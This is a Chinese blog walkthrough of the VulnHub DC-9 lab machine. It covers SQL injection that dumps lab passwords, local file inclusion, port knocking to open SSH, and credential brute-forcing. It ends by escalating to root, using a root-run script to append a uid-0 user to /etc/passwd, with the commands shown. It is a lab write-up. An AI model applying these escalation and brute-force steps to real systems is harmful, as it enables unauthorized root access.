dc9靶机(kockd开端口+写文件提权)

最新推荐文章于 2023-08-11 21:31:34 发布
最新推荐文章于 2023-08-11 21:31:34 发布
阅读量606 收藏
点赞数
分类专栏: 靶机练习
原文链接:https://blog.csdn.net/adminuil/article/details/104055711
版权

SQL注入 LFI knockd SSH提权 密码碰撞
关键词由CSDN通过智能技术生成

前言

DC系列最后一个靶机,还是延续着之前的传统,中规中矩,却不失新意。正如作者所言

all things must come to an end

所有事情最终都会来到终点,但人生还要继续,带着美好回忆迎接下一次挑战。😃

知识点

  1. knockd服务
  2. /etc/passwd文件提权

详细过程

信息搜集

  1. 端口扫描,22端口阻塞

  2. 目录扫描

  3. 浏览网站很容易发现search页面存在sql注入

  4. sqlmap注入成功,具体不再演示,拿到数据如下。

    Table: UserDetails
[17 entries]
+-----------+------------+---------------+
| firstname | lastname   | password      |
+-----------+------------+---------------+
| Mary      | Moe        | 3kfs86sfd     |
| Julie     | Dooley     | 468sfdfsd2    |
| Fred      | Flintstone | 4sfd87sfd1    |
| Barney    | Rubble     | RocksOff      |
| Tom       | Cat        | TC&TheBoyz    |
| Jerry     | Mouse      | B8m#48sd      |
| Wilma     | Flintstone | Pebbles       |
| Betty     | Rubble     | BamBam01      |
| Chandler  | Bing       | UrAG0D!       |
| Joey      | Tribbiani  | Passw0rd      |
| Rachel    | Green      | yN72#dsd      |
| Ross      | Geller     | ILoveRachel   |
| Monica    | Geller     | 3248dsds7s    |
| Phoebe    | Buffay     | smellycats    |
| Scooter   | McScoots   | YR3BVxxxw87   |
| Donald    | Trump      | Ilovepeepee   |
| Scott     | Morrison   | Hawaii-Five-0 |
+-----------+------------+---------------+

     
     
     
     
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23

    还有一个管理员

    admin:transorbital1(使用sqlmap默认字典爆破)

  5. 登陆管理员后只有添加记录的功能,本来想要使用闭合dom树的方式来解析php,但输入有长度限制,放弃。登陆管理员后看到页脚爆file not found错误。猜测存在LFI。

  6. 验证LFI,很幸运file参数直接猜到。

  7. 但LFI不能getshell。接下来的思路应该是fuzz一些系统文件。这里如果有一个强大的字典,应该能够发现/etc/knockd.conf

    这个knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中。

    简单来说就是用来隐藏ssh登陆端口。(也就是我们之前扫描端口时发现22端口阻塞)只有我们按照设定的顺序敲击端口,防火墙才会打开登陆端口。再按照同样的方式可以使防火墙关闭ssh登陆端口,如果别人不知道我们设定的端口敲击顺序,是无法登陆ssh的。我们可以下载knock来开启远程端口,也可以直接用nc敲击端口。

  8. 按顺序敲击7469,8475,9842,22端口开启

getshell

  1. 之后可以用hydra,或者msf结合/etc/passwd文件之前从数据库内拿到的密码撞库ssh。这里我拿到janitor用户ssh密码。登陆后发现密码文件

  2. 使用msf爆破。最终一共拿到四个账户。

提权

  1. 下载提权辅助脚本。在fredf用户运行后发现可疑文件。运行后提示应该使用python写的。

  2. 通过find找到源码

    #!/usr/bin/python

import sys

if len (sys.argv) != 3 :
print (“Usage: python test.py read append”)
sys.exit (1)

else :
f = open(sys.argv[1], “r”)
output = (f.read())

f <span class="token operator">=</span> <span class="token builtin">open</span><span class="token punctuation">(</span>sys<span class="token punctuation">.</span>argv<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token string">"a"</span><span class="token punctuation">)</span>
f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>output<span class="token punctuation">)</span>
f<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16

  • 很明显了,我们通过这个程序可以以root权限合并文件内容。那么如何提权?将用户写入/etc/passwd啊,首先生成密码

    $ perl -le 'print crypt("123456","salt")'
sahL5d5V.UWtI
$ echo "srat1999:sahL5d5V.UWtI:0:0:User_like_root:/root:/bin/bash" >> /tmp/passwd
# 用户名:密码hash:uid:gid:说明:家目录:登陆后使用的shell
$ sudo ./test /tmp/passwd /etc/passwd

  
  
  
  
    • 1
    • 2
    • 3
    • 4
    • 5

  • 最后

热热的雨夜
关注
专栏目录
【vulnhub】【DC系列】DC9 - Knockd 靶机
Nicky_Zheng的博客
01-26 890
1、信息收集 使用netdiscover发现靶机 ip:192.168.57.155 使用nmap发现仅放80端口 1.1、尝试注入 访问页面后,发现search疑似存在SQL注入 使用nmap测试 sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: time-based blind
DC-2靶机(ssh远程SUID(VIM)提权
JyajT的博客
04-23 293
dc系列
vulnhub之DC9靶机
LainWith的博客
02-15 3456
目录介绍信息收集主机发现主机信息探测访问网站爆破网站-失败漏扫网站sqlmap注入任意文件读取漏洞SSH爆破信息收集二次SSH爆破提权方式1提权方式2参考 介绍 系列: DC(此系列共10台) 发布日期:2019年12月29日 难度:中级 Flag:获取root权限并读取唯一的Flag 学习: bp联动xray扫描 sql注入 任意文件读取 ssh提权 靶机地址:https://www.vulnhub.com/entry/dc-9,412/ 从靶场得到提示信息: 靶机更适用Virtualbox
看完这篇 教你玩转渗透测试靶机vulnhub——DC9
Aluxian_的博客
04-19 6569
Vulnhub靶机DC9渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件包含:④:端口敲门: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://dow
DC1-9靶机提权总结
问彡心的博客
09-27 2057
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-9靶机提权
l578900的博客
11-04 2919
完成dc9 靶机平台实现提权root用户 提示:可以登陆的三个用户都没法提权考虑其他用户 提示python的文件对象语句一定要是熟悉
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2559
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
windows下的exe文件运行的提权工具 w11可用
05-12
简单说明一下,exe在运行前会提示用户请求管理员的权限。这就是这个工具的作用。 解决软件发中各种权限不足的问题,各种读取文件失败,读取注册表失败的问题。 如果有什么问题请留言,如果被无良360报毒, 那你看着办。
knock:简单的python端口敲客户端
05-23
grongor / knock 使用python3编的用于端口终止的简单实用程序。 如果您觉得它有用,但您认为它缺少某些功能,请通过创建问题让我知道。 谢谢! 基本用法 knock your.server.com 1234 8521 4785 选项 knock --help将告诉您所需的一切。 这是输出,可以节省您几秒钟: usage: knock [-h] [-t TIMEOUT] [-d DELAY] [-u] host port[:protocol] [port[:protocol] ...] Simple port-knocking client written in python3. See more at https://github.com/grongor/knock positional arguments: host
文件权限以及提权
weixin_30444105的博客
06-02 831
文件权限分基本权限和高级权限 基本权限: 权限主要是设置用户的权限 基本权限分三种: r:读 可以读取文件的内容 w: x:执行 权限 对文件的影响 对目录的影响 r:读 可以读取文件的内容 可以列出目录的内容(文件名) w: 可以更改文件的内容 可以创建或者删...
【Vulnhub靶机】DC-9(端口敲门服务Knockd
过期的秋刀鱼
08-11 603
该服务通过动态的添加iptables规则来隐藏系统启的服务,使用自定义的一系列序列号来“敲门”,使系统启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。目前基本上都使用sha-512算法的,但无论是md5还是sha-256都仍然支持;用户名:密码hash值:uid:gid:说明:家目录:登陆后使用的shell。$salt$是加密时使用的salt,hashed才是真正的密码部分;下的一样的格式,保存在pass文件中。参数,读取请求的数据,来爆破数据库。
提权
mirror97black的博客
12-20 1903
提权
linux文件提权操作,利用Linux文本操作命令ed进行提权
weixin_28914869的博客
04-28 407
本文我将为大家介绍一个面向行的文本编辑器命令“ed”,它主要用于生成,显示,更改和操作文本文件。所有ed命令都在行或行范围内执行操作;例如,“d”命令删除行;“m”命令移动行,“t”命令复制行等等。现在,我们要做的就是利用这些“ed”命令,来提升我们在Linux系统上的用户权限。ed 概要Linux中的ed命令用于启动“ed文本编辑器”,这是一个基于行的文本编辑器。它是Linux中功能最简单的文本...
c语言将文件提权,利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限...
weixin_42497299的博客
05-24 1098
提权:利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限RHEL5-RHEL6下面都可以实现,root的UID是零创建一个普通用户useradd andy切换到andy用户su - andy查看当前用户是谁whoami查看tmp目录权限[andy@bogon tmp]$ ll -d /tmpdrwxrwxrwt. 15 root root 4096 6月 29 14:08 /...
Vunlnhub:靶机DC-9渗透详解
m0_65712192的博客
03-06 1209
Vunlnhub:靶机DC-9渗透详解
靶机实战-DC-5
滕财然的博客
02-27 365
DC-5靶机实战 文章目录DC-5靶机实战1、主机发现2、端口端口详细信息扫描3、访问80端口(http服务)4、提权 1、主机发现 目标IP:192.168.232.169 arp-scan 优点是速度快,但不能跨网段 2、端口端口详细信息扫描 3、访问80端口(http服务) 只发现Contact页面,有一个留言板块 用AWVS扫一下: 发现其它目录,访问扫出来的目录: 发现...
windows提权靶机
最新发布
09-12
Windows提权靶机是用于学习和实践Windows系统提权技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践提权攻击技术。 有一些常见的Windows提...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值